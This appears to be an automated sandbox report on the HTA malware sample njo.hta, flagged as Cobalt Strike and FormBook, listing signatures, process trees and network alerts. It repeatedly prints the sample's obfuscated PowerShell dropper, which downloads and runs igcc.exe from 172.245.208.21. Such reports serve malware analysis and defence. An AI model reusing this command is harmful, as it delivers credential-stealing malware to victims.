
Windows Analysis Report
njo.hta

Overview

General Information

Sample name: njo.hta
Analysis ID: 1665583
MD5: 35f2168ec2d472916d0edfdd18d745cd
SHA1: 0b8f26005fff271f8f056d7c06d006a4aaed2ca2
SHA256: 809b32dd0caf464b9dda815143b7bf0e08d5d8da0ee8a386fbdc8ad51773ee55
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 7572 cmdline: mshta.exe "C:\Users\user\Desktop\njo.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7664 cmdline: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7716 cmdline: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 8064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • igcc.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Roaming\igcc.exe" MD5: BF53CF5790AB537024A9A9C71CF399D6)
          • svchost.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Roaming\igcc.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • WRNKS5Hlc0y.exe (PID: 1336 cmdline: "C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\lfyLlz8ui.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • AtBroker.exe (PID: 7400 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
                • firefox.exe (PID: 7756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

(3 further memory-dump entries are not included in this extract of the report.)

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 13.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 13.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| amsi32_7716.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |

                  System Summary

Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtR
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", ProcessId: 8064, ProcessName: csc.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ParentImage: C:\Users\user\AppData\Roaming\igcc.exe, ParentProcessId: 2668, ParentProcessName: igcc.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ProcessId: 5672, ProcessName: svchost.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICA
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ParentImage: C:\Users\user\AppData\Roaming\igcc.exe, ParentProcessId: 2668, ParentProcessName: igcc.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ProcessId: 5672, ProcessName: svchost.exe

                  Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", ProcessId: 8064, ProcessName: csc.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-04-15T17:19:39.950913+0200 | 2022050 | 1 | A Network Trojan was detected | 172.245.208.21 | 80 | 192.168.2.4 | 49721 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-04-15T17:19:40.227758+0200 | 2022051 | 1 | A Network Trojan was detected | 172.245.208.21 | 80 | 192.168.2.4 | 49721 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-04-15T17:20:29.080987+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49723 | 168.76.121.210 | 80 | TCP |
| 2025-04-15T17:20:52.607697+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49728 | 173.255.194.134 | 80 | TCP |
| 2025-04-15T17:21:16.474432+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:21:31.473477+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 103.105.23.222 | 80 | TCP |
| 2025-04-15T17:21:47.288074+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 156.237.132.252 | 80 | TCP |
| 2025-04-15T17:22:01.319514+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 159.198.64.72 | 80 | TCP |
| 2025-04-15T17:22:15.091476+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.96.1 | 80 | TCP |
| 2025-04-15T17:22:36.798917+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 199.59.243.160 | 80 | TCP |
| 2025-04-15T17:22:51.397675+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:23:05.959781+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 45.130.41.113 | 80 | TCP |
| 2025-04-15T17:23:21.466559+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 18.139.62.226 | 80 | TCP |
| 2025-04-15T17:23:35.251142+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 172.67.217.184 | 80 | TCP |
| 2025-04-15T17:23:53.000995+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 13.248.169.48 | 80 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-04-15T17:20:44.601552+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49725 | 173.255.194.134 | 80 | TCP |
| 2025-04-15T17:20:47.273775+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49726 | 173.255.194.134 | 80 | TCP |
| 2025-04-15T17:20:49.939547+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49727 | 173.255.194.134 | 80 | TCP |
| 2025-04-15T17:21:07.461688+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49729 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:21:11.136466+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:21:13.809200+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:21:22.901273+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 103.105.23.222 | 80 | TCP |
| 2025-04-15T17:21:25.766056+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 103.105.23.222 | 80 | TCP |
| 2025-04-15T17:21:28.614161+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 103.105.23.222 | 80 | TCP |
| 2025-04-15T17:21:38.685744+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 156.237.132.252 | 80 | TCP |
| 2025-04-15T17:21:41.542837+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 156.237.132.252 | 80 | TCP |
